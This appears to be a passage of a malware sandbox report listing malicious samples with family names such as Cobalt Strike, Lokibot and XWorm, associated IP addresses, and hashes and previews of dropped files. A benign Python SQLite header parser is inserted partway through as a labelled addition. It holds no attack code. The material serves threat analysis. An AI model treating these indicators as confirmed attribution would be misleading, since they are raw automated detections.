                           mips.elf                                                                   malicious   Unknown                                   104.168.33.8
                           mpsl.elf                                                                   malicious   Unknown                                   104.168.33.8
                           sh4.elf                                                                    malicious   Unknown                                   107.175.130.16
                                                                                                                                No context
Match (dropped file)                       Associated sample name / URL                                                              Detection   Threat name
C:\Users\user\AppData\Roaming\uahuajd     begoodforeverythinggreatthingsformebetterforgood.hta                                      malicious   Cobalt Strike, SmokeLoader
                                           bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta                   malicious   Cobalt Strike, HTMLPhisher, SmokeLoader
                                           kissmegoodthingwhichgivemebestthignswithgirluaremy.hta                                    malicious   Cobalt Strike, HTMLPhisher, Lokibot
                                           bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.hta                            malicious   Cobalt Strike, HTMLPhisher, Lokibot, Strela Stealer
                                           invoice727282_PDF..exe                                                                    malicious   AgentTesla
                                           #U0410#U0433#U0440#U043e-#U0410#U043b#U044c#U044f#U043d#U0441_(PO_460387320)_pdf.vbs      malicious   Lokibot, PureLog Stealer, zgRAT
                                           6038732).vbs                                                                              malicious   Lokibot
                                           cirby0J3LP.exe                                                                            malicious   AsyncRAT, PureLog Stealer, XWorm, zgRAT
                                           SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe                                       malicious   PureLog Stealer, XWorm
                                           SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe                                       malicious   PureLog Stealer, XWorm
                                                                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):65536
                                                                                                                                                    Entropy (8bit):0.9435287208969765
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:rQJMeeCoQ0LZTkrjyaVwzuiFcWZ24lO8k:ZXCorLZTWjKzuiFcWY4lO8k
                                                                                                                                                    MD5:C34D80AD5BA66F9384B6596979FCCBE6
                                                                                                                                                    SHA1:04CC776CE42171B325B96E9C1A5B455BBAD7B78E
                                                                                                                                                    SHA-256:96CE60921526647D55302507C709DD5C1C54D8C217F4DBC3AFD2ADC47A05C193
                                                                                                                                                    SHA-512:8C733F51A6ED076A26435D435014CD0F845198A89595037904ED41F3A76B4679286D495FA5D7FC959EBA72325D632505F3943F1426B059E359E8C4F500C5D10F
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.8.8.4.5.1.5.2.0.7.8.9.9.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.8.8.4.5.1.5.6.2.9.7.7.1.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.6.a.3.4.1.e.8.-.2.d.9.2.-.4.a.b.9.-.b.2.8.a.-.0.a.b.8.d.b.5.4.8.5.4.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.4.3.d.1.a.b.0.-.8.3.7.9.-.4.1.9.9.-.a.7.1.6.-.0.4.8.0.1.f.c.1.d.c.1.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.e.x.p.l.o.r.e.r...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.E.X.P.L.O.R.E.R...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.9.c.c.-.0.0.0.1.-.0.0.1.4.-.a.1.a.0.-.f.5.8.9.6.f.6.2.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.9.0.b.0.8.0.e.0.6.5.5.7.2.0.c.a.d.8.c.1.c.a.e.4.b.8.1.9.3.c.9.3.8.2.c.9.a.c.9.2.!.e.x.p.l.o.r.e.r...e.x.e.
                                                                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                    File Type:Mini DuMP crash report, 14 streams, Thu Jan 9 08:21:55 2025, 0x1205a4 type
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):57702
                                                                                                                                                    Entropy (8bit):1.5744878635183455
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:OqxBAwK5r1L6MHO2pxdsNb+/Y0lD9pnT2rCt5V:XxBlK3nuubsh+/Y0lD9pnawP
                                                                                                                                                    MD5:7E125FB193F6A49EA4D0F17EBDDA3301
                                                                                                                                                    SHA1:2293A2320773899708DFAD4EC6F2E76D17B12C67
                                                                                                                                                    SHA-256:AAC9F5AF36A9865EEBD0178393CD3A6FD4F76C9D13AA5CDAA1ABC4BB89A0EB1B
                                                                                                                                                    SHA-512:331CF3F73BF71E6D0165A63CF24BCFB74D4F225D7BC9FB331524DB2B16228FD48E587BB27392E2D9CFEB955923258E4846FCC24310B64DF98D352AC7DEE3CC6A
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:MDMP..a..... .......#..g.........................................7..........T.......8...........T...........0...6...........L...........8...............................................................................eJ..............Lw......................T...........!..g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):8558
                                                                                                                                                    Entropy (8bit):3.6959134539963148
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:R6l7wVeJdg1DX6YNIvQgmfqtjbhpD789bUN+fPcm:R6lXJ6B6YS4gmfqtjkU0fh
                                                                                                                                                    MD5:744009C78878BDCDB1DAA12F32A3E6E9
                                                                                                                                                    SHA1:DFC4D6EDCA91E9006C7D2EE2758D185A6A1D1C74
                                                                                                                                                    SHA-256:3B8400BD3CD824CECD1CE45311CBD2190843FF81B3FEB8E8B30EBFBE43BC1A28
                                                                                                                                                    SHA-512:E8F7F0AFF6AB0EEF0C370159164528DD4F3C13F7962CE7AE893857179CBA910C88DF2B24EE7C9439F195516217123F684C4267AB4146B7F8702A664A84F36866
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.5.0.8.<./.P.i.
                                                                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):4719
                                                                                                                                                    Entropy (8bit):4.45160811453856
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:cvIwWl8zsfJg771I9epWpW8VYRYm8M4JYcFdddyq85MN0b9Q36d:uIjfBI7JY7VxJl7Z0ba36d
                                                                                                                                                    MD5:39A11503642FA19446B620E6B4C7FB18
                                                                                                                                                    SHA1:CF214BCF9ECADE43F15D3763419EE2B004A93AAC
                                                                                                                                                    SHA-256:C3178E7E4B6F78ADD5ECB73F448F8145D61AF481D3BA2F280B4FD56778BD5C80
                                                                                                                                                    SHA-512:13F8B4D9CAE6E54BC8A4AF4DF30A7E6BB2BE9BB71E8265B8BF4C388A3D387B52E5752A8656FEAC9796363C5A5E3F3145DF5CC945A7337561AC977B88C91D4CD6
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="668124" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                    Process:C:\Users\user\AppData\Roaming\uahuajd
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:modified
                                                                                                                                                    Size (bytes):311
                                                                                                                                                    Entropy (8bit):5.347482639021185
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:6:Q3La/xwchA2DLIP12MUAvvr3tDLIP12MUAvvR+uTL2ql2ABgTv:Q3La/hhpDLI4M9tDLI4MWuPTAv
                                                                                                                                                    MD5:1AC8524D3800CDD5A91A864BCD4C3AB5
                                                                                                                                                    SHA1:D003AEE44AC954938CE83E4A80412E04F726EA83
                                                                                                                                                    SHA-256:8652A0399D65C2D111841F66EF2E930CDB8291CC8203252D59FD4921FF336C02
                                                                                                                                                    SHA-512:9F28B59B99D0BC1EB60D29BE54CE2DAAC7D9B5D895311169578383C19A46CCF7CDE498EB6D7F172CF7D1D11E5B16665DF989CD8EEC527282BE3B796CD08C7DAC
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..
                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):9434
                                                                                                                                                    Entropy (8bit):4.928515784730612
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
                                                                                                                                                    MD5:D3594118838EF8580975DDA877E44DEB
                                                                                                                                                    SHA1:0ACABEA9B50CA74E6EBAE326251253BAF2E53371
                                                                                                                                                    SHA-256:456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
                                                                                                                                                    SHA-512:103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):64
                                                                                                                                                    Entropy (8bit):1.1628158735648508
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:Nlllul5mxllp:NllU4x/
                                                                                                                                                    MD5:3A925CB766CE4286E251C26E90B55CE8
                                                                                                                                                    SHA1:3FA8EE6E901101A4661723B94D6C9309E281BD28
                                                                                                                                                    SHA-256:4E844662CDFFAAD50BA6320DC598EBE0A31619439D0F6AB379DF978FE81C7BF8
                                                                                                                                                    SHA-512:F348B4AFD42C262BBED07D6BDEA6EE4B7F5CFA2E18BFA725225584E93251188D9787506C2AFEAC482B606B1EA0341419F229A69FF1E9100B01DE42025F915788
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:@...e................................................@..........
                                                                                                                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):40960
                                                                                                                                                    Entropy (8bit):0.8553638852307782
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):20480
                                                                                                                                                    Entropy (8bit):0.848598812124929
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fBODYfOg1ZAJFF0DiUhQ5de5SjhXE1:ThFawNLopFgU10XJBODqzqFF0DYde5P
                                                                                                                                                    MD5:9664DAA86F8917816B588C715D97BE07
                                                                                                                                                    SHA1:FAD9771763CD861ED8F3A57004C4B371422B7761
                                                                                                                                                    SHA-256:8FED359D88F0588829BA60D236269B2528742F7F66DF3ACF22B32B8F883FE785
                                                                                                                                                    SHA-512:E551D5CC3D5709EE00F85BB92A25DDC96112A4357DFEA3D859559D47DB30FEBD2FD36BDFA2BEC6DCA63D3E233996E9FCD2237F92CEE5B32BA8D7F2E1913B2DA9
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):106496
                                                                                                                                                    Entropy (8bit):1.137181696973627
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                                                                                                    MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                                                                                                    SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                                                                                                    SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                                                                                                    SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):51200
                                                                                                                                                    Entropy (8bit):0.8746135976761988
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):20480
                                                                                                                                                    Entropy (8bit):0.6732424250451717
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                    Category:modified
                                                                                                                                                    Size (bytes):196608
                                                                                                                                                    Entropy (8bit):1.1215420383712111
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                                                                                                    MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                                                                                                    SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                                                                                                    SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                                                                                                    SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):32768
                                                                                                                                                    Entropy (8bit):0.017262956703125623
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                    MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                    SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                    SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                    SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):98304
                                                                                                                                                    Entropy (8bit):0.08235737944063153
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                    MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                    SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                    SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                    SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
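The File Type lines in these SQLite records are what file(1) derives from the first 100 bytes of the database, and the Preview fields show that header: the magic string, the big-endian page size, then the fixed payload-fraction bytes (the `@` is 0x40 = 64). The parser below is an added example, not part of the Joe Sandbox report or of the sample: it decodes those fields, reproduces file(1)'s wording, and adds a consistency check the report does not make. The in-header page count is only trustworthy when version-valid-for equals the file change counter, and pages × page size should then equal the dropped file's size (3 × 32768 = 98304 bytes and 25 × 2048 = 51200 bytes for the two records it reconstructs). The two header byte strings are constructed from the values in those records; they are not copied from the dropped files.

```python
import struct

SQLITE_MAGIC = b"SQLite format 3\x00"
ENCODINGS = {1: "UTF-8", 2: "UTF-16 little endian", 3: "UTF-16 big endian"}


def build_header(page_size, write_ver, read_ver, change_counter, pages, cookie,
                 schema_format, encoding, user_version, valid_for, sqlite_version):
    """Assemble a 100-byte SQLite 3 database header (constructed test input)."""
    hdr = bytearray(100)
    hdr[0:16] = SQLITE_MAGIC
    # offset 16: page size, big-endian; the value 1 encodes 65536
    struct.pack_into(">H", hdr, 16, 1 if page_size == 65536 else page_size)
    hdr[18], hdr[19] = write_ver, read_ver          # 1 = rollback journal, 2 = WAL
    hdr[21], hdr[22], hdr[23] = 64, 32, 32          # payload fractions, fixed by the format
    # offsets 24..71: change counter, page count, freelist trunk, freelist count,
    # schema cookie, schema format, cache size, largest root page, text encoding,
    # user version, incremental-vacuum flag, application id
    struct.pack_into(">IIIIIIIIIIII", hdr, 24,
                     change_counter, pages, 0, 0, cookie, schema_format,
                     0, 0, encoding, user_version, 0, 0)
    struct.pack_into(">II", hdr, 92, valid_for, sqlite_version)  # offsets 92 and 96
    return bytes(hdr)


def parse_header(data):
    """Decode the header fields that file(1) reports for SQLite 3 databases."""
    if len(data) < 100 or data[:16] != SQLITE_MAGIC:
        raise ValueError("not a SQLite 3 database header")
    if tuple(data[21:24]) != (64, 32, 32):
        raise ValueError("payload fractions are not 64/32/32; header is corrupt")
    raw_page = struct.unpack_from(">H", data, 16)[0]
    f = struct.unpack_from(">IIIIIIIIIIII", data, 24)
    valid_for, version = struct.unpack_from(">II", data, 92)
    info = {
        "page_size": 65536 if raw_page == 1 else raw_page,
        "write_version": data[18], "read_version": data[19],
        "change_counter": f[0], "pages": f[1], "cookie": f[4],
        "schema_format": f[5], "encoding": f[8], "user_version": f[9],
        "valid_for": valid_for, "sqlite_version": version,
    }
    # The page count at offset 28 is only valid if the transaction that wrote
    # it also set version-valid-for to the current change counter.
    info["pages_valid"] = valid_for == f[0]
    return info


def describe(info):
    """Render the header with the same wording file(1) uses (the File Type lines)."""
    parts = ["SQLite 3.x database"]
    if info["user_version"]:
        parts.append("user version %d" % info["user_version"])
    parts.append("last written using SQLite version %d" % info["sqlite_version"])
    if info["page_size"] != 1024:                   # file(1) omits the default
        parts.append("page size %d" % info["page_size"])
    if info["write_version"] != 1:
        parts.append("writer version %d" % info["write_version"])
    if info["read_version"] != 1:
        parts.append("read version %d" % info["read_version"])
    parts.append("file counter %d" % info["change_counter"])
    parts.append("database pages %d" % info["pages"])
    parts.append("cookie %#x" % info["cookie"])
    parts.append("schema %d" % info["schema_format"])
    parts.append(ENCODINGS.get(info["encoding"], "unknown encoding"))
    parts.append("version-valid-for %d" % info["valid_for"])
    return ", ".join(parts)


def expected_size(info):
    """Size implied by the header (pages * page size), or None if the count is stale."""
    return info["pages"] * info["page_size"] if info["pages_valid"] else None


# Constructed headers carrying the values of two records above.
WAL_CACHE = build_header(32768, 2, 2, 3, 3, 0x1, 4, 1, 12, 3, 3042000)
ROLLBACK_CACHE = build_header(2048, 1, 1, 1, 25, 0xe, 4, 1, 0, 1, 3042000)

if __name__ == "__main__":
    for hdr in (WAL_CACHE, ROLLBACK_CACHE):
        info = parse_header(hdr)
        print(describe(info), "->", expected_size(info), "bytes")
```

When the implied size and the on-disk size disagree, the database was either truncated, still being written when the sandbox snapshot was taken, or the header's page count is stale; a WAL-mode database (writer/read version 2) may also hold committed data in a separate -wal file that the dropped-file listing shows as a second artifact.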
                                                                                                                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):32768
                                                                                                                                                    Entropy (8bit):0.017262956703125623
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                    MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                    SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                    SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                    SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                    Malicious:false
